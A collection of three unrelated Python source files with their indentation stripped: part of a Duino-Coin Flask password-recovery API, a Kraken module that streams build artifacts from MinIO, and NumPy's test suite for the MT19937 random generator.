datab.execute("""SELECT * FROM Users WHERE username = ?""",(username,))
data = datab.fetchone()
if data is None:
return _error("Invalid username.")
if token_hash['email'] != data[2]:
return _error("Invalid token.")
except Exception as e:
print(e)
return _error("Error connecting to DataBase")
alphabet = string.ascii_letters + string.digits
genPassword = ''.join(secrets.choice(alphabet) for i in range(20))
try:
tmpPass = hashpw(genPassword.encode("utf-8"),
gensalt(rounds=BCRYPT_ROUNDS))
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""UPDATE Users
set password = ?
where username = ?""",
(tmpPass, username))
conn.commit()
response = jsonify(result="Your password has been changed, you can now login with your new password", password=genPassword, success=True)
response.headers.add('Access-Control-Allow-Origin', '*')
return response, 200
except Exception as e:
print(e)
return _error(f"Error fetching database")
else:
return _error("This username doesn't exist")
@app.route("/recovery/")
@limiter.limit("1 per 1 day")
def api_recovery():
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
username = request.args.get('username', None)
print(repr(username), "recv")
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
if username:
if user_exists(username):
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT * FROM Users WHERE username = ?""", (username,))
email = str(datab.fetchone()[2])
try:
message = MIMEMultipart("alternative")
message["Subject"] = "🔗 Your Duino-Coin passphrase reset link"
message["From"] = DUCO_EMAIL
message["To"] = email
time = datetime.datetime.utcnow() + datetime.timedelta(minutes=30)
hash = jwt.encode({'username': username, 'email': email, 'exp' : time}, app.config['SECRET_KEY'], algorithm='HS256')
recoveryUrl = "https://wallet.duinocoin.com/recovery.html?username=" + \
username + "&hash=" + \
str(hash).strip("b").strip("'").strip("'")
email_body = html_recovery_template.replace(
"{username}", str(username)).replace(
"{link}", str(recoveryUrl))
part = MIMEText(email_body, "html")
message.attach(part)
with smtplib.SMTP_SSL("smtp.gmail.com", 465) as smtpserver:
smtpserver.login(DUCO_EMAIL, DUCO_PASS)
smtpserver.sendmail(
DUCO_EMAIL, email, message.as_string())
response = jsonify(result="An e-mail has been sent to you with the reset link - please check your mailbox", success=True)
response.headers.add('Access-Control-Allow-Origin', '*')
return response, 200
except Exception as e:
return _error("Error sending e-mail, please try again later")
except Exception as e:
return _error("Error fetching database, please try again later")
else:
return _error("This username isn't registered, make sure you're entering the correct name")
else:
return _error("Username not provided")
|
storage.py
|
#!/usr/bin/env python3
# Copyright 2020 The Kraken Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import mimetypes
from queue import Queue, Empty
from threading import Thread, Event
from flask import abort, Response
import minio
from .models import Run, Flow
from . import consts
log = logging.getLogger('storage')
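# Streams an object out of MinIO without buffering it whole in memory: a
# worker thread (get_bytes) pushes chunks onto a queue while send_bytes is
# consumed by Flask's Response as a generator; the Event marks the end of
# the stream.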
class MinioDownloader:
def __init__(self, bucket_name, timeout=0.01):
minio_addr = os.environ.get('KRAKEN_MINIO_ADDR', consts.DEFAULT_MINIO_ADDR)
access_key = os.environ['MINIO_ACCESS_KEY']
secret_key = os.environ['MINIO_SECRET_KEY']
self.mc = minio.Minio(minio_addr, access_key=access_key, secret_key=secret_key, secure=False)
found = self.mc.bucket_exists(bucket_name)
if not found:
raise Exception('missing %s minio bucket' % bucket_name)
self.bucket_name = bucket_name
self.timeout = timeout
self.bytes = Queue()
self.finished = Event()
self.worker = None
def get_bytes(self, filename):
resp = self.mc.get_object(self.bucket_name, filename)
for chunk in resp.stream():
self.bytes.put(chunk)
resp.release_conn()
self.bytes.join() # wait for all blocks in the queue to be marked as processed
self.finished.set() # mark streaming as finished
def send_bytes(self):
while not self.finished.is_set():
try:
yield self.bytes.get(timeout=self.timeout)
self.bytes.task_done()
except Empty:
self.finished.wait(self.timeout)
self.worker.join()
def download(self, filename):
self.worker = Thread(target=self.get_bytes, args=(filename,))
self.worker.start()
return self.send_bytes()
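# Resolves a public/report artifact to its MinIO location: the bucket is the
# zero-padded branch id, the object key is <flow_id>/<run_id>/<path>, and the
# newest run is used when only a flow id is given.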
def serve_artifact(store_type, flow_id, run_id, path):
log.info('path %s, %s, %s, %s', store_type, flow_id, run_id, path)
if store_type not in ['public', 'report']:
abort(400, "Not supported store type: %s" % store_type)
if flow_id:
flow = Flow.query.filter_by(id=int(flow_id)).one_or_none()
if flow is None:
abort(404, "Flow not found")
runs = []
for r in flow.runs:
runs.append(r.id)
runs.sort()
run_id = runs[-1]
else:
run = Run.query.filter_by(id=int(run_id)).one_or_none()
if run is None:
abort(404, "Run not found")
flow = run.flow
mt, _ = mimetypes.guess_type(path)
if mt is None:
mt = 'application/octet-stream'
bucket_name = '%08d' % flow.branch_id
mc_dl = MinioDownloader(bucket_name)
path = os.path.join(str(flow.id), str(run_id), path)
resp = Response(mc_dl.download(path), mimetype=mt)
return resp
def serve_flow_artifact(store_type, flow_id, path):
return serve_artifact(store_type, flow_id, None, path)
def serve_run_artifact(store_type, run_id, path):
return serve_artifact(store_type, None, run_id, path)
|
test_generator_mt19937.py
|
import sys
import hashlib
import pytest
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_allclose,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
JUMP_TEST_DATA = [
{
"seed": 0,
"steps": 10,
"initial": {"key_md5": "64eaf265d2203179fb5ffb73380cd589", "pos": 9},
"jumped": {"key_md5": "8cb7b061136efceef5217a9ce2cc9a5a", "pos": 598},
},
{
"seed":384908324,
"steps":312,
"initial": {"key_md5": "e99708a47b82ff51a2c7b0625b81afb5", "pos": 311},
"jumped": {"key_md5": "2ecdbfc47a895b253e6e19ccb2e74b90", "pos": 276},
},
{
"seed": [839438204, 980239840, 859048019, 821],
"steps": 511,
"initial": {"key_md5": "9fcd6280df9199785e17e93162ce283c", "pos": 510},
"jumped": {"key_md5": "433b85229f2ed853cde06cd872818305", "pos": 475},
},
]
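# Module-scoped fixture that runs the parametrized tests twice: with
# endpoint=True (closed interval, high inclusive) and endpoint=False
# (half-open interval) for Generator.integers.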
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
return request.param
class TestSeed:
def test_scalar(self):
s = Generator(MT19937(0))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937(4294967295))
assert_equal(s.integers(1000), 324)
def test_array(self):
s = Generator(MT19937(range(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937(np.arange(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937([0]))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937([4294967295]))
assert_equal(s.integers(1000), 324)
def test_seedsequence(self):
s = MT19937(SeedSequence(0))
assert_equal(s.random_raw(1), 2058676884)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5)
assert_raises(ValueError, MT19937, -1)
def test_invalid_array(self):
# seed must be an unsigned integer
assert_raises(TypeError, MT19937, [-0.5])
assert_raises(ValueError, MT19937, [-1])
assert_raises(ValueError, MT19937, [1, -2, 4294967296])
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random = Generator(MT19937(1432985819))
non_contig = random.multinomial(100, pvals=pvals)
random = Generator(MT19937(1432985819))
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
def test_multidimensional_pvals(self):
assert_raises(ValueError, random.multinomial, 10, [[0, 1]])
assert_raises(ValueError, random.multinomial, 10, [[0], [1]])
assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]])
assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestMultivariateHypergeometric:
def setup(self):
self.seed = 8675309
def test_argument_validation(self):
# Error cases...
# `colors` must be a 1-d sequence
assert_raises(ValueError, random.multivariate_hypergeometric,
10, 4)
# Negative nsample
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], -1)
# Negative color
assert_raises(ValueError, random.multivariate_hypergeometric,
[-1, 2, 3], 2)
# nsample exceeds sum(colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], 10)
# nsample exceeds sum(colors) (edge case of empty colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[], 1)
# Validation errors associated with very large values in colors.
assert_raises(ValueError, random.multivariate_hypergeometric,
[999999999, 101], 5, 1, 'marginals')
int64_info = np.iinfo(np.int64)
max_int64 = int64_info.max
max_int64_index = max_int64 // int64_info.dtype.itemsize
assert_raises(ValueError, random.multivariate_hypergeometric,
[max_int64_index - 100, 101], 5, 1, 'count')
@pytest.mark.parametrize('method', ['count', 'marginals'])
def test_edge_cases(self, method):
# Set the seed, but in fact, all the results in this test are
# deterministic, so we don't really need this.
random = Generator(MT19937(self.seed))
x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([], 0, method=method)
assert_array_equal(x, [])
x = random.multivariate_hypergeometric([], 0, size=1, method=method)
assert_array_equal(x, np.empty((1, 0), dtype=np.int64))
x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method)
assert_array_equal(x, [3, 0, 0])
colors = [1, 1, 0, 1, 1]
x = random.multivariate_hypergeometric(colors, sum(colors),
method=method)
assert_array_equal(x, colors)
x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3,
method=method)
assert_array_equal(x, [[3, 4, 5]]*3)
# Cases for nsample:
# nsample < 10
# 10 <= nsample < colors.sum()/2
# colors.sum()/2 < nsample < colors.sum() - 10
# colors.sum() - 10 < nsample < colors.sum()
@pytest.mark.parametrize('nsample', [8, 25, 45, 55])
@pytest.mark.parametrize('method', ['count', 'marginals'])
@pytest.mark.parametrize('size', [5, (2, 3), 150000])
def test_typical_cases(self, nsample, method, size):
random = Generator(MT19937(self.seed))
colors = np.array([10, 5, 20, 25])
sample = random.multivariate_hypergeometric(colors, nsample, size,
method=method)
if isinstance(size, int):
expected_shape = (size,) + colors.shape
else:
expected_shape = size + colors.shape
assert_equal(sample.shape, expected_shape)
assert_((sample >= 0).all())
assert_((sample <= colors).all())
assert_array_equal(sample.sum(axis=-1),
np.full(size, fill_value=nsample, dtype=int))
if isinstance(size, int) and size >= 100000:
# This sample is large enough to compare its mean to
# the expected values.
assert_allclose(sample.mean(axis=0),
nsample * colors / colors.sum(),
rtol=1e-3, atol=0.005)
def test_repeatability1(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5,
method='count')
expected = np.array([[2, 1, 2],
[2, 1, 2],
[1, 1, 3],
[2, 0, 3],
[2, 1, 2]])
assert_array_equal(sample, expected)
def test_repeatability2(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 50,
size=5,
method='marginals')
expected = np.array([[ 9, 17, 24],
[ 7, 13, 30],
[ 9, 15, 26],
[ 9, 17, 24],
[12, 14, 24]])
assert_array_equal(sample, expected)
def test_repeatability3(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 12,
size=5,
method='marginals')
expected = np.array([[2, 3, 7],
[5, 3, 4],
[2, 5, 5],
[5, 3, 4],
[1, 5, 6]])
assert_array_equal(sample, expected)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (self.state['bit_generator'],
self.state['state']['key'],
self.state['state']['pos'])
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
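# Exercises Generator.integers across bool and all fixed-width integer
# dtypes: bound validation for scalars and arrays, extreme/zero-size ranges,
# dtype preservation, and md5-based repeatability checks.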
class TestIntegers:
rfunc = random.integers
# valid integer/boolean types
itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, [0],
endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd] * 2,
[ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [1] * 2, 0,
endpoint=endpoint, dtype=dt)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], [tgt + is_open],
size=1000, endpoint=endpoint, dtype=dt),
tgt)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self, endpoint):
# Don't use fixed seed
random = Generator(MT19937())
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
endpoint=endpoint, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random = Generator(MT19937(1234))
scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
scalar_array = random.integers([lbnd], [ubnd], size=size,
endpoint=endpoint, dtype=dt)
random = Generator(MT19937(1234))
array = random.integers([lbnd] * size, [ubnd] *
size, size=size, endpoint=endpoint, dtype=dt)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': 'b3300e66d2bb59e493d255d47c3a6cbe',
'int16': '39624ead49ad67e37545744024d2648b',
'int32': '5c4810373f979336c6c0c999996e47a1',
'int64': 'ab126c15edff26f55c50d2b7e37391ac',
'int8': 'ba71ccaffeeeb9eeb1860f8075020b9c',
'uint16': '39624ead49ad67e37545744024d2648b',
'uint32': '5c4810373f979336c6c0c999996e47a1',
'uint64': 'ab126c15edff26f55c50d2b7e37391ac',
'uint8': 'ba71ccaffeeeb9eeb1860f8075020b9c'}
for dt in self.itype[1:]:
random = Generator(MT19937(1234))
# view as little endian for hash
if sys.byteorder == 'little':
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt)
else:
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt).byteswap()
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random = Generator(MT19937(1234))
val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random = Generator(MT19937(1234))
val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
dtype=dt)
assert_array_equal(val, val_bc)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
@pytest.mark.parametrize(
'bound, expected',
[(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612,
3769704066, 1170797179, 4108474671])),
(2**32, np.array([517043487, 1364798666, 1733884390, 1353720613,
3769704067, 1170797180, 4108474672])),
(2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673,
1831631863, 1215661561, 3869512430]))]
)
def test_repeatability_32bit_boundary(self, bound, expected):
for size in [None, len(expected)]:
random = Generator(MT19937(1234))
x = random.integers(bound, size=size)
assert_equal(x, expected if size is not None else expected[0])
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[1622936284, 3620788691, 1659384060],
[1417365545, 760222891, 1909653332],
[3788118662, 660249498, 4092002593]],
[[3625610153, 2979601262, 3844162757],
[ 685800658, 120261497, 2694012896],
[1207779440, 1586594375, 3854335050]],
[[3004074748, 2310761796, 3012642217],
[2067714190, 2786677879, 1363865881],
[ 791663441, 1867303284, 2169727960]],
[[1939603804, 1250951100, 298950036],
[1040128489, 3791912209, 3317053765],
[3155528714, 61360675, 2305155588]],
[[ 817688762, 1335621943, 3288952434],
[1770890872, 1102951817, 1957607470],
[3099996017, 798043451, 48334215]]])
for size in [None, (5, 3, 3)]:
random = Generator(MT19937(12345))
x = random.integers([[-1], [0], [1]],
[2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
(-2**63-1, -2**63-1))}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low]*10])
high_a = np.array([high] * 10)
assert_raises(ValueError, random.integers, low, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_a,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high_a,
endpoint=endpoint, dtype=dtype)
low_o = np.array([[low]*10], dtype=object)
high_o = np.array([high] * 10, dtype=object)
assert_raises(ValueError, random.integers, low_o, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_o,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_o, high_o,
endpoint=endpoint, dtype=dtype)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, 'dtype')
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint,
dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
(3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_error_byteorder(self):
other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
with pytest.raises(ValueError):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
# chi2max is the maximum acceptable chi-squared value.
@pytest.mark.slow
@pytest.mark.parametrize('sample_size,high,dtype,chi2max',
[(5000000, 5, np.int8, 125.0), # p-value ~4.6e-25
(5000000, 7, np.uint8, 150.0), # p-value ~7.7e-30
(10000000, 2500, np.int16, 3300.0), # p-value ~3.0e-25
(50000000, 5000, np.uint16, 6500.0), # p-value ~3.5e-25
])
def test_integers_small_dtype_chisquared(self, sample_size, high,
dtype, chi2max):
# Regression test for gh-14774.
samples = random.integers(high, size=sample_size, dtype=dtype)
values, counts = np.unique(samples, return_counts=True)
expected = sample_size / high
chi2 = ((counts - expected)**2 / expected).sum()
assert chi2 < chi2max
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_integers(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[-80, -56], [41, 37], [-83, -16]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test masked rejection sampling algorithm to generate array of
# uint32 in an interval.
random = Generator(MT19937(self.seed))
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_closed(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
assert_array_equal(actual, desired)
def test_integers_max_int(self):
# Tests whether integers with closed=True can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
endpoint=True)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.096999199829214, 0.707517457682192],
[0.084364834598269, 0.767731206553125],
[0.665069021359413, 0.715487190596693]])
assert_array_almost_equal(actual, desired, decimal=15)
random = Generator(MT19937(self.seed))
